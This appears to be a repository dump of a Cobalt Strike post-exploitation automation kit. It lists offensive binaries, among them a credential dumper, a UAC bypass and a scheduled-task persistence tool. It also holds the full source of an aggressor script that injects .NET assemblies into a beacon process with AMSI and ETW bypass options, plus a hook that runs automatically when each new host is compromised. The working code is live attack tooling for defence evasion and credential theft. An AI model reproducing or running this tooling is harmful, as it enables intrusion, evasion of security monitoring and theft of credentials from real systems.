199 | - https://github.com/0x727/SchTask_0x727 200 | -------------------------------------------------------------------------------- /dist/Pillager/Pillager.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lintstar/CS-AutoPostChain/804434a6e48f40ee5dadd936a3f642f528923e88/dist/Pillager/Pillager.bin -------------------------------------------------------------------------------- /dist/Pillager/scloader.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lintstar/CS-AutoPostChain/804434a6e48f40ee5dadd936a3f642f528923e88/dist/Pillager/scloader.x64.o -------------------------------------------------------------------------------- /dist/Pillager/scloader.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lintstar/CS-AutoPostChain/804434a6e48f40ee5dadd936a3f642f528923e88/dist/Pillager/scloader.x86.o -------------------------------------------------------------------------------- /dist/inlineExecute-Assembly/inlineExecute-Assembly.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lintstar/CS-AutoPostChain/804434a6e48f40ee5dadd936a3f642f528923e88/dist/inlineExecute-Assembly/inlineExecute-Assembly.x64.o -------------------------------------------------------------------------------- /dist/inlineExecute-Assembly/inlineExecute-Assembly.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lintstar/CS-AutoPostChain/804434a6e48f40ee5dadd936a3f642f528923e88/dist/inlineExecute-Assembly/inlineExecute-Assembly.x86.o -------------------------------------------------------------------------------- /dist/inlineExecute-Assembly/inlineExecuteAssembly/inlineExecute-Assembly.cna: -------------------------------------------------------------------------------- 1 | #Register command 2 | beacon_command_register( 3 | "inlineExecute-Assembly", 4 | "Load CLR if not already loaded and inject .NET assembly into current beacon process. Avoids creating a new sacraficial process via fork and run technique", 5 | "Synopsis: inlineExecute-Assembly --dotnetassembly /path/to/Assembly.exe --assemblyargs My Args To Pass --amsi --etw"); 6 | 7 | global('$etw $amsi $appDomain $version'); 8 | 9 | #Global vars don't change 10 | $etw = 0; 11 | $revertETW = 0; 12 | $amsi = 0; 13 | $mailSlot = 0; 14 | $entryPoint = 1; 15 | 16 | #Default values set here - if you don't want to use flags to change -> change here 17 | $appDomain = "totesLegit"; 18 | $pipeName = "totesLegit"; 19 | $mailSlotName = "totesLegit"; 20 | 21 | 22 | alias inlineExecute-Assembly { 23 | 24 | #-------------------------------------- Extract/Parse Arguments --------------------------------------# 25 | $data = substr($0, 23); 26 | @args = split(' ', $data); 27 | 28 | local('$_amsi $_etw $_revertETW $_appDomain $_dotNetAssembly $_version $_assemblyargs $_assemblyWithArgs $_entryPoint $_mailSlot $_mailSlotName $_mailSlotNameArgs $_pipeName $_pipeNameArgs'); 29 | 30 | $_amsi = ""; 31 | $_etw = ""; 32 | $_revertETW = ""; 33 | $_mailSlot = ""; 34 | $_mailSlotName = ""; 35 | $_mailSlotNameArgs = ""; 36 | $_pipeName = ""; 37 | $_pipeNameArgs = ""; 38 | $_entryPoint = ""; 39 | $_appDomain = ""; 40 | $_appDomainArgs = ""; 41 | $_dotNetAssembly = ""; 42 | $_dotNetAssemblyArgs = ""; 43 | $_assemblyWithArgs = ""; 44 | 45 | @CliOptions = @("--amsi", "--etw", "--revertetw", "--dotnetassembly", "--assemblyargs", "--appdomain", "--pipe", "--mailslot", "--main"); 46 | 47 | for ($i = 0; $i < size(@args); $i++){ 48 | 49 | if (@args[$i] iswm "--etw"){ 50 | $_etw = 1; 51 | }else if (@args[$i] iswm "--amsi"){ 52 | $_amsi = 1; 53 | }else if (@args[$i] iswm "--revertetw"){ 54 | $_revertETW = 1; 55 | }else if (@args[$i] iswm "--main"){ 56 | $_entryPoint = int(0); 57 | }else if (@args[$i] iswm "--dotnetassembly"){ 58 | $i = $i + 1; 59 | $_dotNetAssembly = @args[$i]; 60 | }else if (@args[$i] iswm "--assemblyargs"){ 61 | $i = $i + 1; 62 | $count = 0; 63 | for ($j = $i; $j < size(@args); $j++){ 64 | if(@args[$j] in @CliOptions){ 65 | break; 66 | }else{ 67 | @_dotNetAssemblyArgs[$count] = @args[$j]; 68 | 69 | #Taking care of arguments embedded within single/double quotes and consider it as one single argument (disregarding spaces). 70 | if(('"' isin @_dotNetAssemblyArgs[$count] || "'" isin @_dotNetAssemblyArgs[$count])){ 71 | 72 | $k = 0; 73 | $j = $j + 1; 74 | 75 | for($k = $j; $k < size(@args); $k++){ 76 | if(lindexOf(@_dotNetAssemblyArgs[$count], '"') == (strlen(@_dotNetAssemblyArgs[$count]) - 1) || lindexOf(@_dotNetAssemblyArgs[$count], "'") == (strlen(@_dotNetAssemblyArgs[$count]) - 1)){ 77 | $k = $k - 1; 78 | break; 79 | } 80 | if('"' isin @args[$k] || "'" isin @args[$k]){ 81 | @_dotNetAssemblyArgs[$count] = @_dotNetAssemblyArgs[$count]." ".@args[$k]; 82 | break; 83 | }else{ 84 | @_dotNetAssemblyArgs[$count] = @_dotNetAssemblyArgs[$count]." ".@args[$k]; 85 | } 86 | } 87 | 88 | $j = $k; 89 | $i = $k; 90 | } 91 | 92 | $count = $count + 1; 93 | 94 | } 95 | } 96 | }else if (@args[$i] iswm "--appdomain"){ 97 | $i = $i + 1; 98 | $count = 0; 99 | for ($j = $i; $j < size(@args); $j++){ 100 | if(@args[$j] in @CliOptions){ 101 | break; 102 | }else{ 103 | @_appDomain[$count] = @args[$j]; 104 | 105 | #Taking care of arguments embedded within single/double quotes and consider it as one single argument (disregarding spaces). 106 | if(('"' isin @_appDomain[$count] || "'" isin @_appDomain[$count])){ 107 | 108 | $k = 0; 109 | $j = $j + 1; 110 | 111 | for($k = $j; $k < size(@args); $k++){ 112 | if(lindexOf(@_appDomain[$count], '"') == (strlen(@_appDomain[$count]) - 1) || lindexOf(@_appDomain[$count], "'") == (strlen(@_appDomain[$count]) - 1)){ 113 | $k = $k - 1; 114 | break; 115 | } 116 | if('"' isin @args[$k] || "'" isin @args[$k]){ 117 | @_appDomain[$count] = @_appDomain[$count]." ".@args[$k]; 118 | break; 119 | }else{ 120 | @_appDomain[$count] = @_appDomain[$count]." ".@args[$k]; 121 | } 122 | } 123 | 124 | $j = $k; 125 | $i = $k; 126 | } 127 | 128 | $count = $count + 1; 129 | 130 | } 131 | } 132 | }else if (@args[$i] iswm "--mailslot"){ 133 | $_mailSlot = 1; 134 | $i = $i + 1; 135 | $count = 0; 136 | for ($j = $i; $j < size(@args); $j++){ 137 | if(@args[$j] in @CliOptions){ 138 | break; 139 | }else{ 140 | @_mailSlotName[$count] = @args[$j]; 141 | 142 | #Taking care of arguments embedded within single/double quotes and consider it as one single argument (disregarding spaces). 143 | if(('"' isin @_mailSlotName[$count] || "'" isin @_mailSlotName[$count])){ 144 | 145 | $k = 0; 146 | $j = $j + 1; 147 | 148 | for($k = $j; $k < size(@args); $k++){ 149 | if(lindexOf(@_mailSlotName[$count], '"') == (strlen(@_mailSlotName[$count]) - 1) || lindexOf(@_mailSlotName[$count], "'") == (strlen(@_mailSlotName[$count]) - 1)){ 150 | $k = $k - 1; 151 | break; 152 | } 153 | if('"' isin @args[$k] || "'" isin @args[$k]){ 154 | @_mailSlotName[$count] = @_mailSlotName[$count]." ".@args[$k]; 155 | break; 156 | }else{ 157 | @_mailSlotName[$count] = @_mailSlotName[$count]." ".@args[$k]; 158 | } 159 | } 160 | 161 | $j = $k; 162 | $i = $k; 163 | } 164 | 165 | $count = $count + 1; 166 | 167 | } 168 | } 169 | }else if (@args[$i] iswm "--pipe"){ 170 | $i = $i + 1; 171 | $count = 0; 172 | for ($j = $i; $j < size(@args); $j++){ 173 | if(@args[$j] in @CliOptions){ 174 | break; 175 | }else{ 176 | @_pipeName[$count] = @args[$j]; 177 | 178 | #Taking care of arguments embedded within single/double quotes and consider it as one single argument (disregarding spaces). 179 | if(('"' isin @_pipeName[$count] || "'" isin @_pipeName[$count])){ 180 | 181 | $k = 0; 182 | $j = $j + 1; 183 | 184 | for($k = $j; $k < size(@args); $k++){ 185 | if(lindexOf(@_pipeName[$count], '"') == (strlen(@_pipeName[$count]) - 1) || lindexOf(@_pipeName[$count], "'") == (strlen(@_pipeName[$count]) - 1)){ 186 | $k = $k - 1; 187 | break; 188 | } 189 | if('"' isin @args[$k] || "'" isin @args[$k]){ 190 | @_pipeName[$count] = @_pipeName[$count]." ".@args[$k]; 191 | break; 192 | }else{ 193 | @_pipeName[$count] = @_pipeName[$count]." ".@args[$k]; 194 | } 195 | } 196 | 197 | $j = $k; 198 | $i = $k; 199 | } 200 | 201 | $count = $count + 1; 202 | 203 | } 204 | } 205 | } 206 | } 207 | #------------------------------------------------------------------------------------------------------# 208 | 209 | #-------------------------------------- Appending .NET assembly arguments --------------------------------------# 210 | 211 | #Appending .NET assembly arguments to $_assemblyWithArgs var (separated by " ") 212 | for ($i = 0; $i < size(@_dotNetAssemblyArgs); $i++){ 213 | if (@_dotNetAssemblyArgs[$i] ne "") { 214 | if ($_assemblyWithArgs ne "") 215 | { 216 | $_assemblyWithArgs = $_assemblyWithArgs." ".@_dotNetAssemblyArgs[$i]; 217 | } 218 | else 219 | { 220 | $_assemblyWithArgs = @_dotNetAssemblyArgs[$i]; 221 | } 222 | 223 | } 224 | } 225 | 226 | #---------------------------------------------------------------------------------------------------------------# 227 | 228 | #-------------------------------------- Appending appDomain arguments --------------------------------------# 229 | 230 | #Appending appDomain arguments to $_appDomainArgs var (separated by " ") 231 | for ($i = 0; $i < size(@_appDomain); $i++){ 232 | if (@_appDomain[$i] ne "") { 233 | if ($_appDomainArgs ne "") 234 | { 235 | $_appDomainArgs = $_appDomainArgs." ".@_appDomain[$i]; 236 | } 237 | else 238 | { 239 | $_appDomainArgs = @_appDomain[$i]; 240 | } 241 | 242 | } 243 | } 244 | 245 | #-------------------------------------- Appending mailSlotName arguments --------------------------------------# 246 | 247 | #Appending mailSlot arguments to $_mailSlotNameArgs var (separated by " ") 248 | for ($i = 0; $i < size(@_mailSlotName); $i++){ 249 | if (@_mailSlotName[$i] ne "") { 250 | if ($_mailSlotNameArgs ne "") 251 | { 252 | $_mailSlotNameArgs = $_mailSlotNameArgs." ".@_mailSlotName[$i]; 253 | } 254 | else 255 | { 256 | $_mailSlotNameArgs = @_mailSlotName[$i]; 257 | } 258 | 259 | } 260 | } 261 | 262 | #-------------------------------------- Appending pipeName arguments --------------------------------------# 263 | 264 | #Appending pipeName arguments to $_pipeNameArgs var (separated by " ") 265 | for ($i = 0; $i < size(@_pipeName); $i++){ 266 | if (@_pipeName[$i] ne "") { 267 | if ($_pipeNameArgs ne "") 268 | { 269 | $_pipeNameArgs = $_pipeNameArgs." ".@_pipeName[$i]; 270 | } 271 | else 272 | { 273 | $_pipeNameArgs = @_pipeName[$i]; 274 | } 275 | 276 | } 277 | } 278 | 279 | if ($_appDomainArgs eq "") { 280 | $_appDomainArgs = $appDomain; 281 | } 282 | if ($_mailSlotNameArgs eq "") { 283 | $_mailSlotNameArgs = $mailSlotName; 284 | } 285 | if ($_pipeNameArgs eq "") { 286 | $_pipeNameArgs = $pipeName; 287 | } 288 | if ($_amsi == "") { 289 | $_amsi = $amsi; 290 | } 291 | if ($_etw == "") { 292 | $_etw = $etw; 293 | } 294 | if ($_revertETW == "") { 295 | $_revertETW = $revertETW; 296 | } 297 | if ($_entryPoint ne int(0)) { 298 | $_entryPoint = $entryPoint; 299 | } 300 | if ($_mailSlot == "") { 301 | $_mailSlot = $mailSlot; 302 | } 303 | 304 | #---------------------------------------------------------------------------------------------------------------# 305 | 306 | #-------------------------------------- Load BOF --------------------------------------# 307 | 308 | # figure out the arch of this session 309 | $barch = barch($1); 310 | 311 | # read in the right BOF file 312 | $handle = openf(script_resource("inlineExecute-Assembly $+ $barch $+ .o")); 313 | $bof = readb($handle, -1); 314 | closef($handle); 315 | if(strlen($bof) < 1) 316 | { 317 | berror($1,"Error: BOF bin could not be found. Please ensure the compiled BOF (.o file) exists in the same folder as this aggressor script"); 318 | return; 319 | } 320 | 321 | #-----------------------------------------------------------------------------------------------# 322 | 323 | #-------------------------------------- Error Handling --------------------------------------# 324 | 325 | $assemblyPath = $_dotNetAssembly; 326 | $bid = $1; 327 | if ($assemblyPath eq "") { 328 | berror($bid, "Run 'help inlineExecute-Assembly'\n"); 329 | return; 330 | } 331 | 332 | if (!-exists $assemblyPath || !-isFile $assemblyPath){ 333 | berror($bid, "File ".$assemblyPath." doesn't exist\n"); 334 | return; 335 | } 336 | 337 | #-----------------------------------------------------------------------------------------------# 338 | 339 | #-------------------------------------- Convert .NET assembly to bytes --------------------------------------# 340 | 341 | #Reading assembly bytes and get the size in bytes 342 | $fileHandle = openf($_dotNetAssembly); 343 | $assemblyLength = lof($_dotNetAssembly); 344 | $assemblyBytes = readb($fileHandle, -1); 345 | closef($fileHandle); 346 | 347 | # pack our arguments 348 | $bofArgs = bof_pack($1, "ziiiiizzzib", $_appDomainArgs, $_amsi, $_etw, $_revertETW, $_mailSlot, $_entryPoint, $_mailSlotNameArgs, $_pipeNameArgs, $_assemblyWithArgs, $assemblyLength, $assemblyBytes); 349 | 350 | # announce what we're doing 351 | btask($1, "Running inlineExecute-Assembly by (@anthemtotheego)"); 352 | 353 | # execute it. 354 | beacon_inline_execute($1, $bof, "go", $bofArgs); 355 | 356 | clear(@_assemblyWithArgs); 357 | clear(@_dotNetAssemblyArgs); 358 | clear(@_appDomainArgs); 359 | clear(@_appDomain); 360 | clear(@_mailSlotNameArgs); 361 | clear(@_mailSlotName); 362 | clear(@_pipeNameArgs); 363 | clear(@_pipeName); 364 | 365 | #------------------------------------------------------------------------------------------------------------------------------# 366 | 367 | } 368 | 369 | 370 | on beacon_initial { 371 | 372 | bsleep($1, "0"); 373 | blog($1,"\c9Automated Post Penetration Chain"); 374 | # 调用whoami函数 375 | whoami($1); 376 | executeDotNetAssembly($1); 377 | } -------------------------------------------------------------------------------- /dist/ipconfig/ipconfig.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lintstar/CS-AutoPostChain/804434a6e48f40ee5dadd936a3f642f528923e88/dist/ipconfig/ipconfig.x64.o -------------------------------------------------------------------------------- /dist/ipconfig/ipconfig.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lintstar/CS-AutoPostChain/804434a6e48f40ee5dadd936a3f642f528923e88/dist/ipconfig/ipconfig.x86.o -------------------------------------------------------------------------------- /dist/screenshot/screenshot.x64.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lintstar/CS-AutoPostChain/804434a6e48f40ee5dadd936a3f642f528923e88/dist/screenshot/screenshot.x64.obj -------------------------------------------------------------------------------- /dist/screenshot/screenshot.x86.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lintstar/CS-AutoPostChain/804434a6e48f40ee5dadd936a3f642f528923e88/dist/screenshot/screenshot.x86.obj -------------------------------------------------------------------------------- /dist/whoami/whoami.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lintstar/CS-AutoPostChain/804434a6e48f40ee5dadd936a3f642f528923e88/dist/whoami/whoami.x64.o -------------------------------------------------------------------------------- /dist/whoami/whoami.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lintstar/CS-AutoPostChain/804434a6e48f40ee5dadd936a3f642f528923e88/dist/whoami/whoami.x86.o -------------------------------------------------------------------------------- /image/image-20240311202300031.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lintstar/CS-AutoPostChain/804434a6e48f40ee5dadd936a3f642f528923e88/image/image-20240311202300031.png -------------------------------------------------------------------------------- /image/image-20240311203426501.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lintstar/CS-AutoPostChain/804434a6e48f40ee5dadd936a3f642f528923e88/image/image-20240311203426501.png -------------------------------------------------------------------------------- /image/image-20240311203512109.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lintstar/CS-AutoPostChain/804434a6e48f40ee5dadd936a3f642f528923e88/image/image-20240311203512109.png -------------------------------------------------------------------------------- /image/image-20240311212850311.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lintstar/CS-AutoPostChain/804434a6e48f40ee5dadd936a3f642f528923e88/image/image-20240311212850311.png -------------------------------------------------------------------------------- /image/image-20240311213745013.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lintstar/CS-AutoPostChain/804434a6e48f40ee5dadd936a3f642f528923e88/image/image-20240311213745013.png -------------------------------------------------------------------------------- /image/image-20240311214005973.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lintstar/CS-AutoPostChain/804434a6e48f40ee5dadd936a3f642f528923e88/image/image-20240311214005973.png -------------------------------------------------------------------------------- /image/image-20240311214050853.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lintstar/CS-AutoPostChain/804434a6e48f40ee5dadd936a3f642f528923e88/image/image-20240311214050853.png -------------------------------------------------------------------------------- /image/image-20240311215101658.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lintstar/CS-AutoPostChain/804434a6e48f40ee5dadd936a3f642f528923e88/image/image-20240311215101658.png -------------------------------------------------------------------------------- /image/image-20240311215420501.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lintstar/CS-AutoPostChain/804434a6e48f40ee5dadd936a3f642f528923e88/image/image-20240311215420501.png -------------------------------------------------------------------------------- /scripts/Pillager.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lintstar/CS-AutoPostChain/804434a6e48f40ee5dadd936a3f642f528923e88/scripts/Pillager.exe -------------------------------------------------------------------------------- /scripts/SharpBypassUAC.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lintstar/CS-AutoPostChain/804434a6e48f40ee5dadd936a3f642f528923e88/scripts/SharpBypassUAC.exe -------------------------------------------------------------------------------- /scripts/SharpHostInfo.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lintstar/CS-AutoPostChain/804434a6e48f40ee5dadd936a3f642f528923e88/scripts/SharpHostInfo.exe -------------------------------------------------------------------------------- /scripts/SharpKatz.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lintstar/CS-AutoPostChain/804434a6e48f40ee5dadd936a3f642f528923e88/scripts/SharpKatz.exe -------------------------------------------------------------------------------- /scripts/SharpSchTask.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lintstar/CS-AutoPostChain/804434a6e48f40ee5dadd936a3f642f528923e88/scripts/SharpSchTask.exe --------------------------------------------------------------------------------